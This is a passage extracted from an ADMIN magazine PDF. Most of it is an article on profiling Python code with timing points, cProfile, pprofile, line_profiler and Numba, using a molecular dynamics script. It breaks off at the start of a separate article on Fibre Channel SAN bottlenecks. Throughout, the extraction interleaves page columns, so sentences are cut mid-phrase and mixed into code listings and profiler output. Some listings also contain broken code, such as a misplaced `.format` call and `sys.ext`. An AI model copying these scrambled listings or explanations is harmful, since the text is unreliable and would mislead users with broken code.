78 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Python Code Analysis N U TS A N D B O LTS

Manual Profiling cProfile, as the name hints, is writ- statistical profiling (pure Python).
ten in C as a Python extension and The form of pprofile is:
The manual profiling approach is comes in the standard Python 3,
fairly simple but involves inserting which keeps the overhead low, so the $ pprofile some_python_executable arg1 ...
timing points into your code. Tim- profiler doesn’t affect the amount of
ing points surround a section of code time much. After the tool finishes, it prints anno-
and collect the total elapsed time(s) cProfile outputs a few stats about the tated code of each file involved in the
for the section, as well as how many test code: execution.
times the section is executed. From Q ncalls – Number of calls to the By default, pprofile profiling is de-
this information, you can calculate portion of code. terministic, which, although it slows
an average elapsed time. The timing Q tottime – Total time spent in the down the code, produces a very com-
points can be spread throughput the given function (excludes time plete profile. You can also use ppro-
code, so you get an idea of how much made in calls to subfunctions). file in a statistical manner, which
time each section of the code takes. Q percall – tottime divided by uses much less time:
The elapsed times are printed at the ncalls.
end of execution, to give you an idea Q cumtime – Cumulative time spent in $ pprofile --statistic .01 code.py
of where you should focus your ef- the specific function, including all
forts to improve performance. subfunctions. With the statistic option, you also
A key advantage of this approach is Q percall – cumtime divided by need to specify the period of time
its generally low overhead. Addition- ncalls. between sampling. In this example, a
ally, you can control which portions cProfile also outputs the file name of period of 0.01 seconds was used.
of the code are timed (you don’t have the code, in case multiple file are in- Be careful when using the statistic
to profile the entire code). A down- volved, as well as the line number of option because, if the sample time is
side is that you have to instrument the function (lineno). too long, you can miss computations,
your code by inserting timing points Running cProfile is fairly simple: and the output will incorrectly record
throughout. However, inserting these zero percent activity. Conversely, to
points is not difficult. $ python -m cProfile -s cumtime script.py get a better estimation of the time
An easy way to accomplish this uses spent in certain portions of the code,
the Python time module. Simple code The first part of the command tells you have to reduce the time between
from an article on the Better Program- Python to use the cProfile module. samples to the point of almost deter-
ming [1] website (example 16) is The output from cProfile is sorted ministic profiling.
shown in Listing 1. The code simply (-s) by cumtime
calls the current time before and after (cumulative time). Listing 1: Time to Execute
a section of code of interest. The dif- The last option on import time
ference is elapsed time, or the amount the command line
of time needed to execute that section is the Python code start_time = time.time()
# Code to check follows
of code. of interest. cProfile
a, b = 1,2
If a section of code is called repeat- also has an option c = a + b
edly, just sum the elapsed times for (-o) to send the # Code to check ends
the section and sum the number stats to an output end_time = time.time()
of times that section is used; then, file instead of time_taken = (end_time- start_time)
you can compute the average time stdout. Listing 2
print(" Time taken in seconds: {0} s").format(time_taken_in_micro)
through the code section. If the num- shows a sample of
ber of calls is large enough, you can the first few lines
do some quick descriptive statistics from cProfile on Listing 2: cProfile Output
and compute the mean, median, vari- a variation of the Thu Nov 7 08:09:57 2019
ance, min, max, and deviations. MD code. 12791143 function calls (12788375 primitive calls) in 156.745 seconds

Ordered by: cumulative time


cProfile pprofile
ncalls tottime percall cumtime percall filename:lineno(function)
cProfile is a deterministic profiler for To get a line-by- 148/1 0.001 0.000 156.745 156.745 {built-in method builtins.exec}
Python and is recommended “… for line profile of your 1 149.964 149.964 156.745 156.745 md_002.py:3()
most users.” In general terms, it cre- code, you can use 12724903 3.878 0.000 3.878 0.000 {built-in method builtins.min}
ates a set of statistics that lists the the pprofile tool for 1 2.649 2.649 2.727 2.727 md_002.py:10(init)
total time spent in certain parts of the a granular, thread- 50 0.168 0.003 0.168 0.003 md_002.py:127(update)
175/2 0.001 0.000 0.084 0.042 :978(_find_and_load)
code, as well as how often the portion aware analysis for
...
of the code was called. deterministic or

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 79
N U TS A N D B O LTS Python Code Analysis

The deterministic pprofile sample Line-by-Line Function can help. The line_profiler module
output in Listing 3 uses the same performs line-by-line profiling of
Profiling
code as the previous cProfile ex- functions, and the kernprof script al-
ample. I cut out sections of the The useful pprofile analyzes your lows you to run either line_profiler
output because it is very extensive. I entire code line by line. It can or standard Python profilers such as
do want to point out the increase in also do deterministic and statisti- cProfile.
execution time by about a factor of cal profiling. If you want to focus To have kernprof run line_profiler,
10 (i.e., it ran 10 times slower than on a specific function within your enter,
without profiling). code, line_profiler and kernprof
$ kernprof -l script_to_profile.py
Listing 3: pprofile Output
Command line: md_002.py which will produce a binary file,
Total duration: 1662.48s script_to_profile.py.lprof. To “de-
File: md_002.py code” the data, you can enter the
File duration: 1661.74s (99.96%) command:
Line #| Hits| Time| Time per hit| %|Source code
------+----------+-------------+-------------+-------+----------- $ python3 -m line_profiler U
1| 0| 0| 0| 0.00%|# md test code script_to_profile.py.lprof > results.txt
2| 0| 0| 0| 0.00%|
3| 2| 3.50475e-05| 1.75238e-05| 0.00%|import platform
and look at the results.txt file.
4| 1| 2.19345e-05| 2.19345e-05| 0.00%|from time import clock
To get line_profiler to profile only
(call)| 1| 2.67029e-05| 2.67029e-05| 0.00%|# :1009 _handle_fromlist
5| 1| 2.55108e-05| 2.55108e-05| 0.00%|import numpy as np
certain functions, put an @profile
(call)| 1| 0.745732| 0.745732| 0.04%|# :978 _find_and_load decorator before the function declara-
6| 1| 2.57492e-05| 2.57492e-05| 0.00%|from sys import exit tion. The output is the elapsed time
(call)| 1| 1.7643e-05| 1.7643e-05| 0.00%|# :1009 _handle_fromlist for the routine. The percentage of
7| 1| 7.86781e-06| 7.86781e-06| 0.00%|import time time, which is something I tend to
... check first, is relative to the total time
234| 0| 0| 0| 0.00%| # Compute the potential energy and forces for the function (be sure to remember
235| 12525000| 51.0831| 4.07849e-06| 3.07%| for j in range(0, p_num): that). The example in Listing 4 is
236| 12500000| 51.6473| 4.13179e-06| 3.11%| if (i != j):
output for some example code dis-
237| 0| 0| 0| 0.00%| # Compute RIJ, the displacement vector
cussed in the next section.
238| 49900000| 210.704| 4.22253e-06| 12.67%| for k in range(0, d_num):
239| 37425000| 177.055| 4.73093e-06| 10.65%| rij[k] = pos[k,i] - pos[k,j]
240| 0| 0| 0| 0.00%| # end for Example Code
241| 0| 0| 0| 0.00%|
242| 0| 0| 0| 0.00%| # Compute D and D2, a distance and a To better illustrate the process of
truncated distance using a profiler, I chose some MD
243| 12475000| 50.5158| 4.04936e-06| 3.04%| d = 0.0 Python code with a fair amount of
244| 49900000| 209.465| 4.1977e-06| 12.60%| for k in range(0, d_num): arithmetic intensity that could eas-
245| 37425000| 175.823| 4.69801e-06| 10.58%| d = d + rij[k] ** 2 ily be put into functions. Because
246| 0| 0| 0| 0.00%| # end for I’m not a computational chemist,
247| 12475000| 78.9422| 6.32803e-06| 4.75%| d = np.sqrt(d)
let me quote from the website: “The
248| 12475000| 64.7463| 5.19008e-06| 3.89%| d2 = min(d, np.pi / 2.0)
computation involves following
249| 0| 0| 0| 0.00%|
the paths of particles which exert a
250| 0| 0| 0| 0.00%| # Attribute half of the total
potential energy to particle J
distance-dependent force on each
251| 12475000| 84.7846| 6.79636e-06| 5.10%| potential = potential + 0.5 * other. The particles are not con-
np.sin(d2) * np.sin(d2) strained by any walls; if particles
252| 0| 0| 0| 0.00%| meet, they simply pass through each
253| 0| 0| 0| 0.00%| # Add particle J's contribution to the other. The problem is treated as a
force on particle I. coupled set of differential equations.
254| 49900000| 227.88| 4.56674e-06| 13.71%| for k in range(0, d_num): The system of differential equation
255| 37425000| 244.374| 6.52971e-06| 14.70%| force[k,i] = force[k,i] - rij[k] * is discretized by choosing a dis-
np.sin(2.0 * d2) / d
crete time step. Given the position
256| 0| 0| 0| 0.00%| # end for
and velocity of each particle at one
257| 0| 0| 0| 0.00%| # end if
time step, the algorithm estimates
258| 0| 0| 0| 0.00%|
259| 0| 0| 0| 0.00%| # end for
these values at the next time step.
... To compute the next position of
each particle requires the evaluation

80 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Python Code Analysis N U TS A N D B O LTS

of the right hand side of its corre- Listing 4: Profiling a Function


sponding differential equation.”
Total time: 0.365088 s
File: ./md_002.py
Serial Code and Profiling Function: update at line 126

When you download the Python Line # Hits Time Per Hit % Time Line Contents
version of the code, it already has ==============================================================
several functions. To better illustrate 126 @profile
profiling the code, I converted it 127 def update(d_num, p_num, rmass, dt, pos, vel, acc, force):
128
to simple serial code and called it
129 # Update
md_001.py (Listing 5). Then, I pro-
130
filed the code with cProfile: 131 # Update positions
132 200 196.0 1.0 0.1 for i in range(0, d_num):
$ python3 -m cProfile -s cumtime md_001.py 133 75150 29671.0 0.4 8.1 for j in range(0, p_num):
134 75000 117663.0 1.6 32.2 pos[i,j] = pos[i,j] + vel[i,j]*dt + 0.5 *
Listing 6 is the top of the profile acc[i,j]*dt*dt
135 # end for
output ordered by cumulative time
136 # end for
(cumtime). Notice that the profile out-
137
put only lists the code itself. Because 138 # Update velocities
it doesn’t profile the code line by 139 200 99.0 0.5 0.0 for i in range(0, d_num):
line, it’s impossible to learn anything 140 75150 29909.0 0.4 8.2 for j in range(0, p_num):
about the code. 141 75000 100783.0 1.3 27.6 vel[i,j] = vel[i,j] + 0.5*dt*( force[i,j] *
I also used pprofile: rmass + acc[i,j] )
142 # end for
143 # end for
$ pprofile md_001.py
144
145 # Update accelerations.
The default options cause the code 146 200 95.0 0.5 0.0 for i in range(0, d_num):
to run much slower because it is 147 75150 29236.0 0.4 8.0 for j in range(0, p_num):
tracking all computations (i.e., it is 148 75000 57404.0 0.8 15.7 acc[i,j] = force[i,j]*rmass
not sampling), but the code lines 149 # end for
150 # end for
relative to the run time still impart
151
some good information (Listing 7).
152 50 32.0 0.6 0.0 return pos, vel, acc
Note that the code ran slower by

Listing 5: md001.py
## MD is the main program for the molecular dynamics simulation. #
# # Input, integer STEP_NUM, the number of time steps.
# Discussion: # A value of 500 is a small but reasonable value.
# MD implements a simple molecular dynamics simulation. # The default value is 500.
# #
# The velocity Verlet time integration scheme is used. # Input, real DT, the time step.
# The particles interact with a central pair potential. # A value of 0.1 is large; the system will begin to move quickly but the
# # results will be less accurate.
# Licensing: # A value of 0.0001 is small, but the results will be more accurate.
# This code is distributed under the GNU LGPL license. # The default value is 0.1.
# Modified: #
# 26 December 2014
# import platform
# Author: from time import clock
# John Burkardt import numpy as np
# from sys import exit
# Parameters: import time
# Input, integer D_NUM, the spatial dimension.
# A value of 2 or 3 is usual. def timestamp ( ):
# The default value is 3. t = time.time ( )
# print ( time.ctime ( t ) )
# Input, integer P_NUM, the number of particles.
# A value of 1000 or 2000 is small but "reasonable". return None
# The default value is 500. # end def

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 81
N U TS A N D B O LTS Python Code Analysis

Listing 5: md001.py (continued)


if (seed == 0):
# =================== print('' )
# Main section of code print( 'R8MAT_UNIFORM_AB - Fatal error!')
# ==================== print(' Input SEED = 0!' )
timestamp() sys.ext('R8MAT_UNIFORM_AB - Fatal error!')
print('') # end if
print('MD_TEST')
print(' Python version: %s' % (platform.python_version( ) )) pos = np.zeros( (d_num, p_num) )
print(' Test the MD molecular dynamics program.')
for j in range(0, p_num):
# Initialize variables for i in range(0, d_num):
d_num = 3 k = (seed // 127773)
p_num = 500
step_num = 50 seed = 16807 * (seed - k * 127773) - k * 2836
dt = 0.1
mass = 1.0 seed = (seed % i4_huge)
rmass = 1.0 / mass
if (seed < 0):
wtime1 = clock( ) seed = seed + i4_huge
# end if
# output:
print('' ) pos[i,j] = a + (b - a) * seed * 4.656612875E-10
print('MD' ) # end for
print(' Python version: %s' % (platform.python_version( ) ) ) # end for
print(' A molecular dynamics program.' )
print('' ) # Velocities
print(' D_NUM, the spatial dimension, is %d' % (d_num) ) vel = np.zeros([ d_num, p_num ])
print(' P_NUM, the number of particles in the simulation is %d.' % (p_num) )
print(' STEP_NUM, the number of time steps, is %d.' % (step_num) ) # Accelerations
print(' DT, the time step size, is %g seconds.' % (dt) ) acc = np.zeros([ d_num, p_num ])
else:
print('' ) # Update
print(' At each step, we report the potential and kinetic energies.' )
print(' The sum of these energies should be a constant.' ) # Update positions
print(' As an accuracy check, we also print the relative error' ) for i in range(0, d_num):
print(' in the total energy.' ) for j in range(0, p_num):
print('' ) pos[i,j] = pos[i,j] + vel[i,j] * dt + 0.5 * acc[i,j] * dt * dt
print(' Step Potential Kinetic (P+K-E0)/E0' ) # end for
print(' Energy P Energy K Relative Energy Error') # end for
print('')
# Update velocities
step_print_index = 0 for i in range(0, d_num):
step_print_num = 10 for j in range(0, p_num):
step_print = 0 vel[i,j] = vel[i,j] + 0.5 * dt * ( force[i,j] * rmass +
acc[i,j] )
for step in range(0, step_num+1): # end for
if (step == 0): # end for
# Initialize
# Update accelerations.
# Positions for i in range(0, d_num):
seed = 123456789 for j in range(0, p_num):
acc[i,j] = force[i,j] * rmass
a = 0.0 # end for
b = 10.0 # end for
# endif
i4_huge = 2147483647
# compute force, potential, kinetic
if (seed < 0): force = np.zeros([ d_num, p_num ])
seed = seed + i4_huge rij = np.zeros(d_num)
# end if
potential = 0.0

82 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Python Code Analysis N U TS A N D B O LTS

Listing 5: md001.py (continued)


for k in range(0, d_num):
for i in range(0, p_num): for j in range(0, p_num):
kinetic = kinetic + vel[k,j] ** 2
# Compute the potential energy and forces. # end for
for j in range(0, p_num): # end for
if (i != j):
kinetic = 0.5 * mass * kinetic
# Compute RIJ, the displacement vector.
for k in range(0, d_num): if (step == 0):
rij[k] = pos[k,i] - pos[k,j] e0 = potential + kinetic
# end for # endif

# Compute D and D2, a distance and a truncated distance. if (step == step_print):


rel = (potential + kinetic - e0) / e0
d = 0.0 print(' %8d %14f %14f %14g' % (step, potential, kinetic, rel) )
for k in range(0, d_num): step_print_index = step_print_index + 1
d = d + rij[k] ** 2 step_print = (step_print_index * step_num) // step_print_num
# end for #end if
d = np.sqrt(d)
d2 = min(d, np.pi / 2.0) # end step

# Attribute half of the total potential energy to particle J. wtime2 = clock( )


potential = potential + 0.5 * np.sin(d2) * np.sin(d2)
print('')
# Add particle J's contribution to the force on particle I. print(' Elapsed wall clock time = %g seconds.' % (wtime2 - wtime1) )
for k in range(0, d_num):
force[k,i] = force[k,i] - rij[k] * np.sin(2.0 * d2) / d # Terminate
# end for
# end if print('')
print('MD_TEST')
# end for print(' Normal end of execution.')
# end for
timestamp ( )
# Compute the kinetic energy
kinetic = 0.0 # end if

about a factor of 10. Only the parts ing potential energy and forces. This function. Perhaps a bit counterin-
of the code with some fairly large code produced the output shown tuitively, I created a function that
percentages of time are shown. in Listing 8. Notice that the time initializes the algorithm and a sec-
The output from pprofile provides an to compute the potential and force ond function for the update loops
indication of where the code uses the update values is 181.9 seconds with and called the resulting code md_002.
most time: a total time of 189.5 seconds. Obvi- py. (My modified code is available
ously, this is where you would need to online.) Because the potential energy
* The loop computing <C>rij[k]<C>. focus your efforts
to improve code Listing 6: cProfile Output
* The loop summing <C>d<C> (collective performance. Sat Oct 26 09:43:21 2019
operation). 12791090 function calls (12788322 primitive calls) in 163.299 seconds
First Function
* Computing the square root of <C>d<C>. Ordered by: cumulative time
Creation
* Computing <C>d2<C>. The potential ncalls tottime percall cumtime percall filename:lineno(function)
energy and force 148/1 0.001 0.000 163.299 163.299 {built-in method builtins.exec}
* Computing the <C>potential<C> energy. computations 1 159.297 159.297 163.299 163.299 md_001.py:3()
are the dominant 12724903 3.918 0.000 3.918 0.000 {built-in method builtins.min}
* The loop computing the <C>force<C> array. part of the run 175/2 0.001 0.000 0.083 0.042 :978(_find_and_load)
time, so to better 175/2 0.001 0.000 0.083 0.042 :948(_find_and_load_unlocked)
Another option is to put timing points profile them, it 165/2 0.001 0.000 0.083 0.041 :663(_load_unlocked)
throughout the code, focusing primar- is best to isolate ...
ily on the section of the code comput- that code in a

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 83
N U TS A N D B O LTS Python Code Analysis

and force computations change very Final Version md_003.py, has a properties function
little, I won’t be profiling this version that computes the potential energy
of the code. All I did was make sure The final version of the code moves and forces.
I was getting the same answers as in the section of code computing the po- The cProfile results don’t show any-
the previous version. However, feel tential energy and forces into a func- thing useful, so I will skip that out-
free to practice profiling it. tion for better profiling. The code, put. On the other hand, the pprofile

Listing 7: pprofile Output


Command line: ./md_001.py
Total duration: 1510.79s
File: ./md_001.py
File duration: 1510.04s (99.95%)
Line #| Hits| Time| Time per hit| %|Source code
------+----------+-------------+-------------+-------+-----------
...
141| 25551| 0.0946999| 3.70631e-06| 0.01%| for i in range(0, p_num):
142| 0| 0| 0| 0.00%|
143| 0| 0| 0| 0.00%| # Compute the potential energy and forces.
144| 12775500| 47.1989| 3.69449e-06| 3.12%| for j in range(0, p_num):
145| 12750000| 47.4793| 3.72387e-06| 3.14%| if (i != j):
146| 0| 0| 0| 0.00%|
147| 0| 0| 0| 0.00%| # Compute RIJ, the displacement vector.
148| 50898000| 194.963| 3.83046e-06| 12.90%| for k in range(0, d_num):
149| 38173500| 166.983| 4.37432e-06| 11.05%| rij[k] = pos[k,i] - pos[k,j]
150| 0| 0| 0| 0.00%| # end for
151| 0| 0| 0| 0.00%|
152| 0| 0| 0| 0.00%| # Compute D and D2, a distance and a truncated distance.
153| 0| 0| 0| 0.00%|
154| 12724500| 46.7333| 3.6727e-06| 3.09%| d = 0.0
155| 50898000| 195.426| 3.83956e-06| 12.94%| for k in range(0, d_num):
156| 38173500| 165.494| 4.33531e-06| 10.95%| d = d + rij[k] ** 2
157| 0| 0| 0| 0.00%| # end for
158| 12724500| 72.0723| 5.66406e-06| 4.77%| d = np.sqrt(d)
159| 12724500| 59.0492| 4.64059e-06| 3.91%| d2 = min(d, np.pi / 2.0)
160| 0| 0| 0| 0.00%|
161| 0| 0| 0| 0.00%| # Attribute half of the total potential energy to particle J.
162| 12724500| 76.7099| 6.02852e-06| 5.08%| potential = potential + 0.5 * np.sin(d2) * np.sin(d2)
163| 0| 0| 0| 0.00%|
164| 0| 0| 0| 0.00%| # Add particle J's contribution to the force on particle I.
165| 50898000| 207.158| 4.07005e-06| 13.71%| for k in range(0, d_num):
166| 38173500| 228.123| 5.97595e-06| 15.10%| force[k,i] = force[k,i] - rij[k] * np.sin(2.0 * d2) / d
167| 0| 0| 0| 0.00%| # end for
168| 0| 0| 0| 0.00%| # end if
169| 0| 0| 0| 0.00%|
170| 0| 0| 0| 0.00%| # end for
171| 0| 0| 0| 0.00%| # end for
172| 0| 0| 0| 0.00%|
...

Listing 8: md_001b.py Output


Elapsed wall clock time = 189.526 seconds. Total Time for force update = 181.927011 seconds
Avg Time for force update = 0.000014 seconds
Total Time for position update = 0.089102 seconds
Avg Time for position update = 0.001782 seconds Total Time for force loop = 75.269342 seconds
Total Time for velocity update = 0.073946 seconds Avg Time for force loop = 0.000006 seconds
Avg Time for velocity update = 0.001479 seconds
Total Time for acceleration update = 0.031308 seconds Total Time for rij loop = 25.444300 seconds
Avg Time for acceleration update = 0.000626 seconds Avg Time for rij loop = 0.000002 seconds

Total Time for potential update = 103.215999 seconds MD_TEST


Avg Time for potential update = 0.000008 seconds Normal end of execution.

84 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Python Code Analysis N U TS A N D B O LTS

output has some useful information Listing 9: md_003.py Output Excerpts


(Listing 9). The excerpts mostly
Command line: md_003.py
focus on the function that computes Total duration: 1459.49s
potential energy and forces. Notice File: md_003.py
that the overall time to run the code File duration: 1458.73s (99.95%)
Line #| Hits| Time| Time per hit| %|Source code
is still about 10 times longer. ------+----------+-------------+-------------+-------+-----------
Again, most of the time in the code 1| 0| 0| 0| 0.00%|# md test code
is spent in the properties function, 2| 0| 0| 0| 0.00%|
3| 2| 3.40939e-05| 1.70469e-05| 0.00%|import platform
which computes the potential energy 4| 1| 2.28882e-05| 2.28882e-05| 0.00%|from time import clock
and forces. The first few loops take (call)| 1| 2.71797e-05| 2.71797e-05| 0.00%|# :1009 _handle_fromlist
up most of the time. 5| 1| 2.69413e-05| 2.69413e-05| 0.00%|import numpy as np
(call)| 1| 0.751632| 0.751632| 0.05%|# :978 _find_and_load
Out of curiosity, I looked at the out-
6| 1| 2.47955e-05| 2.47955e-05| 0.00%|from sys import exit
put from line_profiler (Listing 10). (call)| 1| 1.78814e-05| 1.78814e-05| 0.00%|# :1009 _handle_fromlist
Remember that all time percentages 7| 1| 8.34465e-06| 8.34465e-06| 0.00%|import time
...
are relative to the time for that par-
160| 51| 0.000295162| 5.78749e-06| 0.00%|def properties(p_num, d_num, pos, vel, mass):
ticular routine (not the entire code). 161| 0| 0| 0| 0.00%|
The first couple of loops used a fair 162| 50| 0.000397682| 7.95364e-06| 0.00%| import numpy as np
percentage of the run time. The last 163| 0| 0| 0| 0.00%|
164| 0| 0| 0| 0.00%|
loop that computes the force array, 165| 0| 0| 0| 0.00%| # compute force, potential, kinetic
166| 50| 0.000529528| 1.05906e-05| 0.00%| force = np.zeros([ d_num, p_num ])
for k in range(0, d_num): 167| 50| 0.000378609| 7.57217e-06| 0.00%| rij = np.zeros(d_num)
168| 0| 0| 0| 0.00%|
force[k,i] = force[k,i] - rij[k] * U 169| 50| 0.000226259| 4.52518e-06| 0.00%| potential = 0.0
np.sin U 170| 0| 0| 0| 0.00%|
(2.0 * d2) / d 171| 25050| 0.0909703| 3.63155e-06| 0.01%| for i in range(0, p_num):
172| 0| 0| 0| 0.00%|
173| 0| 0| 0| 0.00%| # Compute the potential energy and forces
used about 25 percent of the run time 174| 12525000| 44.7758| 3.57492e-06| 3.07%| for j in range(0, p_num):
for this function. 175| 12500000| 45.4399| 3.63519e-06| 3.11%| if (i != j):
176| 0| 0| 0| 0.00%| # Compute RIJ, the displacement vector
If you look at this routine in the
177| 49900000| 183.525| 3.67786e-06| 12.57%| for k in range(0, d_num):
md_003.py file, I’m sure you can find 178| 37425000| 155.539| 4.15603e-06| 10.66%| rij[k] = pos[k,i] - pos[k,j]
some optimizations that would im- 179| 0| 0| 0| 0.00%| # end for
180| 0| 0| 0| 0.00%|
prove performance.
181| 0| 0| 0| 0.00%| # Compute D and D2, a distance and a
truncated distance
182| 12475000| 44.5996| 3.57512e-06| 3.06%| d = 0.0
Using Numba 183| 49900000| 184.464| 3.69668e-06| 12.64%| for k in range(0, d_num):
184| 37425000| 155.339| 4.15067e-06| 10.64%| d = d + rij[k] ** 2
As part of the profiling, I moved 185| 0| 0| 0| 0.00%| # end for
parts of the code to functions. With 186| 12475000| 68.8519| 5.51919e-06| 4.72%| d = np.sqrt(d)
Python, this allowed me to perform 187| 12475000| 56.0835| 4.49567e-06| 3.84%| d2 = min(d, np.pi / 2.0)
188| 0| 0| 0| 0.00%|
deterministic profiling without result- 189| 0| 0| 0| 0.00%| # Attribute half of the total
ing in a long run time. Personally, I potential energy to particle J
like deterministic profiling better than 190| 12475000| 74.6307| 5.98242e-06| 5.11%| potential = potential + 0.5 *
np.sin(d2) * np.sin(d2)
statistical because I don’t have to 191| 0| 0| 0| 0.00%|
find the time interval that results in a 192| 0| 0| 0| 0.00%| # Add particle J's contribution to the
good profile. force on particle I.
193| 49900000| 199.233| 3.99264e-06| 13.65%| for k in range(0, d_num):
Putting parts of the code in func-
194| 37425000| 212.352| 5.67406e-06| 14.55%| force[k,i] = force[k,i] - rij[k] *
tions provides a good starting point np.sin(2.0 * d2) / d
for using Numba. I described the 195| 0| 0| 0| 0.00%| # end for
use of Numba in a previous high- 196| 0| 0| 0| 0.00%| # end if
197| 0| 0| 0| 0.00%|
performance Python article [2]. I 198| 0| 0| 0| 0.00%| # end for
made a few more changes to the last 199| 0| 0| 0| 0.00%| # end for
version of the code (md_003.py) and, 200| 0| 0| 0| 0.00%|
201| 0| 0| 0| 0.00%| # Compute the kinetic energy
because the properties routine took 202| 50| 0.000184059| 3.68118e-06| 0.00%| kinetic = 0.0
a majority of the run time, I targeted 203| 200| 0.000753641| 3.76821e-06| 0.00%| for k in range(0, d_num):
this routine with Numba and simply 204| 75150| 0.265535| 3.5334e-06| 0.02%| for j in range(0, p_num):
205| 75000| 0.298971| 3.98628e-06| 0.02%| kinetic = kinetic + vel[k,j] ** 2
used jit to compile the code. 206| 0| 0| 0| 0.00%| # end for
The original code, before using 207| 0| 0| 0| 0.00%| # end for
Numba, was around 140 seconds 208| 0| 0| 0| 0.00%|
209| 50| 0.000200987| 4.01974e-06| 0.00%| kinetic = 0.5 * mass * kinetic
on my laptop. After using Numba

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 85
N U TS A N D B O LTS Python Code Analysis

Listing 9: md_003.py Output Excerpts (continued) and running on all eight cores of my
laptop (four “real” cores and four
210| 0| 0| 0| 0.00%|
211| 50| 0.000211716| 4.23431e-06| 0.00%| return force, kinetic, potential hyper-threading (HT) cores), it ran in
212| 0| 0| 0| 0.00%| about 3.6 seconds. I would call that
213| 0| 0| 0| 0.00%|# end def a success.
...

Listing 10: md_003.py line_profiler Output


Summary
Total time: 358.778 s Profiling Python is not always an easy
File: ./md_003.py task, but I hope I’ve covered some
Function: properties at line 159
of the tools you might use. Before
Line # Hits Time Per Hit % Time Line Contents using any of the tools, be sure you
============================================================== know how it does the profiling – de-
159 @profile
160 def properties(p_num, d_num, pos, vel, mass): terministic or statistical – and what it
161 is profiling – the entire code or just a
162 50 164.0 3.3 0.0 import numpy as np function.
163
164 Although I didn’t talk much about
165 # compute force, potential, kinetic putting timing points in code (manual
166 50 351.0 7.0 0.0 force = np.zeros([ d_num, p_num ]) profiling), I’m a bit old school. That
167 50 153.0 3.1 0.0 rij = np.zeros(d_num)
168 level of control lets me gather tim-
169 50 30.0 0.6 0.0 potential = 0.0 ing data for various portions of code
170 pretty easily. If you are old school
171 25050 14447.0 0.6 0.0 for i in range(0, p_num):
172
like me, you are probably already us-
173 # Compute the potential energy and forces ing this method in your code. If you
174 12525000 7036459.0 0.6 2.0 for j in range(0, p_num): haven’t done it before, I suggest giv-
175 12500000 7730669.0 0.6 2.2 if (i != j):
176 # Compute RIJ, the displacement vector
ing it a try.
177 49900000 33530834.0 0.7 9.3 for k in range(0, d_num): In using one or more of the profiling
178 37425000 39827594.0 1.1 11.1 rij[k] = pos[k,i] - pos[k,j] tools, I suggest putting code in func-
179 # end for
180
tions and profiling those functions
181 # Compute D and D2, a distance and a deterministically, if possible, so you
truncated distance can isolate various parts of a pro-
182 12475000 7182783.0 0.6 2.0 d = 0.0
gram. While you are isolating parts of
183 49900000 33037923.0 0.7 9.2 for k in range(0, d_num):
184 37425000 39131501.0 1.0 10.9 d = d + rij[k] ** 2 your code in functions, why not take
185 # end for advantage of the situation and look at
186 12475000 25236413.0 2.0 7.0 d = np.sqrt(d)
using Numba to compile these func-
187 12475000 13375864.0 1.1 3.7 d2 = min(d, np.pi / 2.0)
188 tions? The speed-up obtained can be
189 # Attribute half of the total potential pretty amazing. Q
energy to particle J
190 12475000 31104186.0 2.5 8.7 potential = potential + 0.5 * np.sin(d2)
* np.sin(d2)
191 Info
192 # Add particle J's contribution to the
[1] Better Programming:
force on particle I.
193 49900000 34782251.0 0.7 9.7 for k in range(0, d_num): [https://medium.com/better-programming/
194 37425000 86664317.0 2.3 24.2 force[k,i] = force[k,i] - rij[k] * 20-python-snippets-you-should-learn-
np.sin(2.0 * d2) / d today-8328e26ff124]
195 # end for
196 # end if [2] “High-Performance Python – Compiled
197 Code and C Interface” by Jeff Layton:
198 # end for [http://www.admin-magazine.com/HPC/
199 # end for
200 Articles/High-Performance-Python-3/
201 # Compute the kinetic energy (language)/eng-US]
202 50 33.0 0.7 0.0 kinetic = 0.0
203 200 147.0 0.7 0.0 for k in range(0, d_num):
204 75150 44048.0 0.6 0.0 for j in range(0, p_num):
205 75000 78144.0 1.0 0.0 kinetic = kinetic + vel[k,j] ** 2 The Author
206 # end for Jeff Layton has been in the HPC business
207 # end for
208 for almost 25 years (starting when he was 4
209 50 47.0 0.9 0.0 kinetic = 0.5 * mass * kinetic years old). He can be found lounging around
210 at a nearby Frys enjoying the coffee and
211 50 37.0 0.7 0.0 return force, kinetic, potential
waiting for sales.

86 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
N U TS A N D B O LTS Fibre Channel SAN Bottlenecks

Monitor and optimize


Fibre Channel SAN performance

Tune Up
We discuss the possible bottlenecks in Fibre Channel storage area message and all buffer credits are
used up, no further data packets are
networks and how to resolve them. By Roland Döllinger transmitted until the sender receives
the message. Actual flow control of
In the past, spinning hard disks bus adapter (HBA) and a switch port, the data is handled by the higher
were often a potential bottleneck negotiate a number of FC frames, level SCSI protocol.
for fast data processing, but in the which are added to the input buffer Suppose a server writes data over
age of hybrid and all-flash storage as buffer credits at the other end, a Fibre Channel SAN to a remote
systems, the bottlenecks are shift- allowing the sender to transmit a cer- storage system; the FC frames are
ing to other locations on the storage tain number of frames to the receiver forwarded to multiple locations along
area network (SAN). I talk about on a network without having to wait the way in the B2B process, as is the
where it makes sense to influence for each individual data packet to be case whenever an HBA or a storage
the data stream and how possible confirmed (Figure 1). port communicates with a switch
bottlenecks can be detected at an For each data packet sent, the buf- port or two switches exchange data
early stage. To this end, I will be fer credit is reduced by a value of with each other over one or more
determining the critically important one, and for each data packet con- Inter-Switch Link (ISL) connections
performance parameters within a firmed by the other party, the value connected in parallel. With this FC
Fibre Channel SAN and showing op- increases by one. The remote sta- transport layer method – service
timization approaches. tion sends a receive ready (R_RDY) class 3 (connectionless without ac-
The Fibre Channel (FC) protocol is message to the sender as soon as knowledgement) optimized for mass
connectionless and transports data the frames have been processed storage data – many FC devices can
packets in buffer-to-buffer (B2B) and new data can be sent. If the communicate in parallel with high
mode. Two endpoints, such as a host sender does not receive this R_RDY bandwidth. However, this type of
Lead Image © 3dkombinat, 123RF.com

Figure 1: The Fibre Channel frames are transferred by the SAN from the sender (server) to the receiver (storage array) over the FC switch
ports by the connectionless buffer-to-buffer method.

88 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Fibre Channel SAN Bottlenecks N U TS A N D B O LTS

